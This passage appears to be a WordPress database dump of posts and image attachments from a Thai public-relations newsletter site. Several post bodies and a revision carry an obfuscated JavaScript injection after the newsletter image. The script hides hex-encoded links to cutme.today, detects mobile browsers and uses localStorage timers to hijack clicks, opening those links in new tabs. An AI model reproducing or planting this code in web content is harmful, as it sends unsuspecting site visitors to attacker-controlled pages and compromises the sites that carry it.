_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-3','','','2024-07-27 22:39:07','2024-07-27 15:39:07','',0,'http://pakhaeng.ssk.in.th/?p=194',0,'post','',0),
(195,1,'2024-07-27 22:38:52','2024-07-27 15:38:52','','3-1-2566','','inherit','','closed','','3-1-2566-2','','','2024-07-27 22:38:52','2024-07-27 15:38:52','',194,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-1-2566-1.png',0,'attachment','image/png',0),
(196,1,'2024-07-27 22:39:06','2024-07-27 15:39:06','<!-- wp:image {\"id\":195,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-1-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-195\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','194-revision-v1','','','2024-07-27 22:39:06','2024-07-27 15:39:06','',194,'http://pakhaeng.ssk.in.th/?p=196',0,'revision','',0),
(197,1,'2024-07-27 22:39:50','2024-07-27 15:39:50','<!-- wp:image {\"id\":198,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-2-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-198\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-4','','','2024-07-27 22:39:51','2024-07-27 15:39:51','',0,'http://pakhaeng.ssk.in.th/?p=197',0,'post','',0),
(198,1,'2024-07-27 22:39:36','2024-07-27 15:39:36','','3-2-2566','','inherit','','closed','','3-2-2566-2','','','2024-07-27 22:39:36','2024-07-27 15:39:36','',197,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-2-2566-1.png',0,'attachment','image/png',0),
